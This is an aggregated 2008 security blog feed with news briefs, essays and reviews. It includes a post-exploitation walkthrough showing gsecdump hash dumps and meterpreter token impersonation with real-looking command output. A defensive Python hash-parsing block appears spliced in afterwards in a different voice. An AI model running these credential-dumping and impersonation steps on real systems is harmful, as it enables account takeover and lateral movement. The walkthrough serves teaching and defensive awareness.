Spliced feed for Security Bloggers Network
Bypassing ASP.NET “ValidateRequest” for Script Injection Attacks [Security Circus] Posted: 14 Sep 2008 04:05 AM CDT
Travel: Off to VMworld 2008 in Vegas [Rational Survivability] Posted: 13 Sep 2008 06:54 PM CDT
I'm looking forward to meeting with fellow practitioners, analysts, folks from VMware, Microsoft, Citrix and vendors as well as attending many of the sessions and labs. There are several meet-ups including community get-togethers, so if you're in town, ping me and let's get together and exchange ideas. There's a bunch of anticipated high-profile announcements and I hope some of them pan out. I'll be live-blogging/tweeting (beaker) as much as possible from the show. See you there. /Hoff
Losing our History [Security For All] Posted: 13 Sep 2008 04:01 PM CDT
My wife and I spent the Independence Day weekend this year in Washington DC. In addition to watching the fireworks from the base of the Iwo Jima memorial we visited a number of other memorials and museums. But probably the most amazing place we visited was the National Archives. Aside from the U.S. Constitution and Declaration of Independence, the National Archives is in fact an archive of the U.S. government’s correspondence, business and legal transactions, some of which are on exhibit. These exhibits include excerpts from the infamous Nixon Watergate tapes to (my personal favorite) a letter from a 10-year-old Fidel Castro to President Franklin D. Roosevelt dated November 6, 1940, asking for a “ten dollar bill green American” (maybe Roosevelt should have sent him the 10 bucks - you never know). The fact is that the National Archive is a repository of everything the U.S. Government is involved in. Everything. The good, the bad, the ugly. The greatest achievements, the finest moments and the things we would like to forget. Especially the things we’d like to forget. This is everything from the most visible, substantial and important documents like the U.S. Constitution to mundane interoffice correspondence, which can in the long run be just as important historically. You might think that the digital age has made the job of the National Archives quite a bit easier. Unfortunately nothing could be further from the truth, as this article from the New York Times points out.
While those conspiracy theory fans among us (okay, I admit it - but the truth is out there) prefer a more tantalizing threat like a shadowy cabal that secretly removes and suppresses information embarrassing or threatening to their members, the reality is much more mundane - and insidious. And it’s a whole lot harder to address.
That’s right - it’s those pesky end users. You know, those regular folks who are just trying to get their job done as efficiently as possible. Yeah, those people who we never have the time or budget to provide with decent hardware and software. And forget about education (no money for that in this year’s budget). Oh, and the folks who actually control the purse strings don’t have “keep a public record of the stupid things we do” at the top of their must-fund list. (Yes! I knew I could slide a conspiracy theory in there). All this is really patriotic, and sufficiently alarmist to get some good hits on Google, but what does it have to do with security, Mr. Security For All? Actually - everything. Remember the CIA triad: Confidentiality, Integrity and Availability. This issue is fundamental to both Integrity and Availability. From Wikipedia:
I think we can all agree that not saving important information through neglect is the same thing as deleting important data. And when future generations - or a researcher today - can’t get access to an email that is germane to their research because it was never saved, that violates availability. So how do we go about mitigating this threat? There is already a program in progress to bring the National Archives more fully into the 21st century, but it is not without its all too typical problems.
As a point of reference 32 million White House e-mail messages were preserved as records of the Clinton administration. The National Archives expects to receive hundreds of millions from the Bush White House. And since disputes over White House records have occurred at the end of the last three administrations, we can count on more litigation in January. So here’s a bold idea: why not take the money that will be flushed down the litigation rat hole and put it towards the electronic record-keeping system? Oh, but wait, that would mean that politicians would have to be subject to the same laws, standards and directives that all government employees are. Or maybe Lockheed Martin could get some help from the IBM Almaden research guys on storing, indexing and accessing insane amounts of information since the Webfountain project went dark. Or underground. (Yes! another conspiracy theory reference). In any case this is a risk that must be managed - and soon - before we lose what amounts to our civic cultural heritage.
SFO Network Administrator Debacle Still Evident [Infosecurity.US] Posted: 13 Sep 2008 01:53 PM CDT
NetworkWorld’s Robert McMillan reports issues revolving around, and from, the dispute between the City of San Francisco and its former network administrator - Terry Childs - (now rogue, and incarcerated) are still evident.
[1] NetworkWorld: San Francisco Hunts For Mystery Device On City Network
Have an iPhone? All Use Captured In Screenshots. Automagically. [Infosecurity.US] Posted: 13 Sep 2008 01:48 PM CDT
Wired’s GadgetLab blogger Brian X. Chen reports a new (and a potential windfall for forensic research) functionality of Apple’s (NasdaqGS: APPL) iPhone smartphone. Evidently, during a blogcast, forensics specialist Jonathan Zdziarski divulged the capability of the device to cache a copy of the latest screen activity. Apparently, this functionality is intended for the purpose of supporting the aesthetics of the product. From the post: “…This is purely for aesthetic purposes: When an iPhone user taps the Home button, the window of the application you have open shrinks and disappears. In order to create that shrinking effect, the iPhone snaps a screenshot, Zdziarski said…”
Criminals Attack Large Hadron Collider Website [Infosecurity.US] Posted: 13 Sep 2008 01:38 PM CDT
The Telegraph UK’s Roger Highfield [Science Editor] reports criminal hackers, apparently based in Greece, have defaced the Large Hadron Collider website in Switzerland. Scientists at CERN also speculated on the possibility of the hack attempts leading to a shutdown of the facility.
12th IACR International Workshop on Practice and Theory in Public Key Cryptography [Infosecurity.US] Posted: 13 Sep 2008 12:44 PM CDT
The IACR has issued a call for papers for the 12th IACR International Workshop on Practice & Theory in Public Key Cryptography 2009. (Note: Infosecurity.US is a member of the IACR). The full Call for Papers Notification appears after the jump.
US-CERT: Reports of DHS Email Spam [Infosecurity.US] Posted: 13 Sep 2008 12:43 PM CDT
US-CERT has released a notification specifying a new spam attack using Department of Homeland Security addresses.
Playing with Live Streams for SRT [Network Security Blog] Posted: 13 Sep 2008 08:07 AM CDT
This morning Michael Santarcangelo and I will be playing with streaming the audio from a Security Roundtable podcast. We don’t really have a topic or a theme for the podcast. We don’t even have any stories to talk about. We’ll just be sitting online, talking and testing out how to use the streaming software. And let me tell you, this software has more options and tricks than I’ll use in a long, long time. The stream will start at 7:00 am PDT at http://hak5radio.com:8000/SRT.mp3.m3u I think. I may have the URL munged up a little, so if that doesn’t work, try it with just the .mp3 extension. We have a guest lined up thanks to a tweet last night, but this really is just going to be 3 security guys talking about whatever interests them for about 45 minutes. If this works out, Rich and I may try streaming the Network Security Podcast when we record. We can’t do anything as organized as actually have a set time and date for our recording sessions, but this will be one step closer to being able to do so. PS. I created a channel for today’s session on IRC.freenode.net. Predictably, the channel name is ##SRT.
Hackers attack Large Hadron Collider [Security Circus] Posted: 13 Sep 2008 08:00 AM CDT
United 'bankruptcy' points to new stock scam techniques [Security Circus] Posted: 13 Sep 2008 07:57 AM CDT
Large Hadron Collider - LHC Livecam [Security Circus] Posted: 13 Sep 2008 07:50 AM CDT
"Apple views tennis-shoe DRM as a way to head off what it sees as a potential ..." [Security Circus] Posted: 13 Sep 2008 07:24 AM CDT
Apple views tennis-shoe DRM as a way to head off what it sees as a potential plague of sneaker hacking. "Some people," the patent application observes, "have taken it upon themselves to remove the sensor from the special pocket of the [iPod-linked] Nike+ shoe and place it at inappropriate locations (shoelaces, for example) or place it on non-Nike+ model shoes." Oh my God: Geeks are ripping the sensors out of their sneakers and sticking them on their shoelaces! Unleash the shoe nazis! It used to be cool to be an Apple fanboy. Now it's starting to be embarrassing. –Apple declares war on sneaker hackers
International Data Privacy Laws by Country [Security Circus] Posted: 13 Sep 2008 04:26 AM CDT
UCSB Security Group's Attack on Voting Machines (Part 2 of 2) [Security Circus] Posted: 13 Sep 2008 04:24 AM CDT
UCSB Security Group's Attack on Voting Machines (Part 1 of 2) [Security Circus] Posted: 13 Sep 2008 04:24 AM CDT
via ThreatExpert [Security Circus] Posted: 13 Sep 2008 04:08 AM CDT
"Sabina Guzzanti, known for her take-offs of the prime minister, Silvio Berlus..." [Security Circus] Posted: 13 Sep 2008 04:02 AM CDT
Sabina Guzzanti, known for her take-offs of the prime minister, Silvio Berlusconi, risks being jailed for up to five years. The prosecutors recommended to the justice ministry that she be indicted because of a speech she made to a leftwing rally in July. Referring to the attitude to gay people of the Catholic church and Pope Benedict - the former cardinal Joseph Ratzinger - Guzzanti said: "In 20 years Ratzinger will be dead and will end up in hell, tormented by queer demons - not passive ones, but very active ones." –Comedian who satirised Pope could face prosecution | World news | The Guardian. Reposted from sid77
passing the hash with gsecdump and msvctl (yes more) [Carnal0wnage Blog] Posted: 12 Sep 2008 08:59 PM CDT
So just a follow up post on gsecdump and msvctl after doing prep for post exploitation topics for the toorcon workshop. For some reason I thought that gsecdump would not require admin privileges; this is incorrect, it will require admin or system on the box. What it doesn't require is injecting into lsass to get the hashes (at least according to here). "Most notable features are extracting password hashes for active logon sessions, LSA secrets without injecting into lsass.exe making it safe to run on any system and pwdump functionality without DLL injection (and a lot more stable). Gsecdump has no DLL dependency making it very easy to use on remote systems with psexec. If it for some reason can't do what it is supposed to, try running it as SYSTEM and you should get your info." OK, so you still need admin or higher but the cool thing (and I have already covered this) is that it dumps the hashes for active logon sessions. Now, the key to that is active logon sessions. So if you are userland and admin or higher then you might be stuck with that user's hash because once they log out the active logon session hash seems to disappear (sometimes ??) but if you get a system shell you might get some of the old logged in users.
example:

    #popped a system shell and got a command shell with meterpreter
    C:\Documents and Settings\nobody\Desktop>gsecdump -u
    gsecdump -u
    MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

    #logged into the box as nobody
    C:\Documents and Settings\nobody\Desktop>gsecdump -u
    gsecdump -u
    XPSP1VM\nobody::e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
    MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

    Logged out as nobody
    C:\Documents and Settings\nobody\Desktop>gsecdump -u
    gsecdump -u
    MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Once nobody logs out, things were back to where they were. This is an important distinction between gsecdump/msvctl and token stealing. But, once you have a hash, any user can use that hash, where you have to be admin/system to pass tokens. Let's see the same scenario with incognito:

    meterpreter > list_tokens -u
    Delegation Tokens Available
    ========================================
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    Impersonation Tokens Available
    ========================================
    NT AUTHORITY\ANONYMOUS LOGON

    #login as nobody
    meterpreter > list_tokens -u
    Delegation Tokens Available
    ========================================
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    XPSP1VM\nobody
    Impersonation Tokens Available
    ========================================
    NT AUTHORITY\ANONYMOUS LOGON

    #log out as nobody
    meterpreter > list_tokens -u
    Delegation Tokens Available
    ========================================
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    Impersonation Tokens Available
    ========================================
    NT AUTHORITY\ANONYMOUS LOGON
    XPSP1VM\nobody

    meterpreter > impersonate_token XPSP1VM\\nobody
    [-] No delegation token available
    [+] Successfully impersonated user XPSP1VM\nobody
    meterpreter > getuid
    Server username: XPSP1VM\nobody
    meterpreter > rev2self
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM

Lastly, like I already mentioned in the other msvctl post, you have to actually be sitting on the box to get your new shell with the user's creds you passed because it pops up a whole new command shell. Which is kind of a bummer, with a remote shell. You'll have to use the pass the hash toolkit instead.

Some other reading on gsecdump and msvctl:
http://blogs.pointbridge.com/Blogs/seaman_derek/Pages/Post.aspx?_ID=20
http://ciac.llnl.gov/ciac/techbull/CIACTech08-002.shtml
http://truesecurity.se/blogs/murray/archive/2007/06/08/my-sec-310-sesson-on-teched-us-2007-is-now-available-as-a-webcast.aspx

Also I was doing some googling on pass the hash and came across this post in reference to the pass the hash problem, best part in bold. http://www.eggheadcafe.com/software/aspnet/30890366/hash-injection-mitigation.aspx

best quote: "Hash injection mitigation? - Steve Riley [MSFT] 06-Oct-07: In either case, you need to become admin of the computer before you can force the compromised machine to release its hashes from memory, which lessens the likelihood of success. And if you did manage to become admin, there are far more interesting attacks that you'd want to attempt. By the way, sniffing a network connection won't reveal hashes. In other words, there's nothing new here, and very little that you need to worry about."

I don't know, going from a local admin on a box to domain admin is pretty interesting to me...
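To make the "active logon sessions" behaviour above concrete from the defender's side, here is an added example (my own code, not the author's and not part of gsecdump or msvctl) that parses pwdump-format lines like the ones in the post, diffs the three captures to show which session hash appeared at logon and vanished at logoff, and raises two hardening findings from a snapshot: an LM hash still being stored on the host and an NT hash of an empty password. The three snapshots are the author's captures reproduced as constructed strings; the function and class names are my own.

```python
import re
from dataclasses import dataclass

# Well-known constants: the LM field when no LM hash is stored, and the
# NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump-style line: DOMAIN\user:RID:LMHASH:NTHASH:::  (gsecdump leaves RID blank)
LINE_RE = re.compile(
    r"^(?P<acct>[^:]+):(?P<rid>[^:]*):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed from the three captures in the post: before nobody logs in,
# while nobody is logged in, and after nobody logs out.
MACHINE = "MSHOME\\XPSP1VM$::" + EMPTY_LM + ":" + EMPTY_NT + ":::"
NOBODY = "XPSP1VM\\nobody::e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::"
SNAP_IDLE = MACHINE
SNAP_LOGGED_IN = NOBODY + "\n" + MACHINE
SNAP_LOGGED_OUT = MACHINE


@dataclass(frozen=True)
class Cred:
    account: str
    lm: str
    nt: str

    @property
    def lm_stored(self) -> bool:
        # A real LM hash means NoLMHash is not enforced on this host.
        return self.lm.lower() != EMPTY_LM

    @property
    def blank_password(self) -> bool:
        return self.nt.lower() == EMPTY_NT


def parse(text: str) -> dict:
    """Map account name -> Cred for every well-formed hash line; prompts and
    echoed commands never match LINE_RE and are skipped."""
    creds = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            creds[m["acct"]] = Cred(m["acct"], m["lm"], m["nt"])
    return creds


def session_diff(before: dict, after: dict) -> tuple:
    """(appeared, vanished) account names between two gsecdump -u runs."""
    return sorted(set(after) - set(before)), sorted(set(before) - set(after))


def findings(creds: dict) -> list:
    """Hardening findings a defender would raise from one snapshot."""
    out = []
    for c in creds.values():
        if c.lm_stored:
            out.append(f"{c.account}: LM hash stored (enable NoLMHash)")
        if c.blank_password:
            out.append(f"{c.account}: NT hash of an empty password")
    return out
```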
Book Review: Understanding UNIX/Linux Programming [Reflections on Security] Posted: 12 Sep 2008 07:59 PM CDT
I've posted a review of Understanding UNIX/LINUX Programming: A Guide to Theory and Practice by Bruce Molay on Amazon. While not a security topic per se, a solid grounding in systems programming is a prerequisite for vulnerability researchers and other technically oriented security professionals. Arguably, there is no better introduction to the subject than this book.
Book Review: Against The Gods - The Remarkable Story Of Risk [Reflections on Security] Posted: 12 Sep 2008 07:42 PM CDT
To many practitioners, information security is a form of risk management. Since it is impossible to protect a complex system against all conceivable security threats, an approach based on the assessment of risk is employed to distinguish between the threats that are worth worrying about and those that aren't. But what exactly does the concept of risk represent? How does one measure (never mind control) risk? This is an age-old problem mankind has been struggling with for centuries.
DNI Open Source Conference 2008 - Remarks From CIA Director [Infosecurity.US] Posted: 12 Sep 2008 05:55 PM CDT
The Office of the Director of National Intelligence (ODNI) has released the following transcript, detailing the remarks and question & answer session during Day 2 (yesterday, September 12th, 2008) of the ODNI Open Source Conference in Washington, D.C. Without further ado, we are publishing this fascinating transcript after the break.
Nmap 4.75 Released [Infosecurity.US] Posted: 12 Sep 2008 03:54 PM CDT
Insecure.org has announced the release of Nmap 4.75, with nearly 100 significant enhancements from version 4.68. Certainly, one compelling reason to upgrade from a previous version is the application's ability to graphically map network topologies.
Another Twitter Vulnerability [Infosecurity.US] Posted: 12 Sep 2008 03:23 PM CDT
DARKNET posts in a follow-on (no pun intended) report, of yet another Twitter vulnerability; this time a CSRF (Cross Site Response Forgery) vulnerability which apparently permits forced following.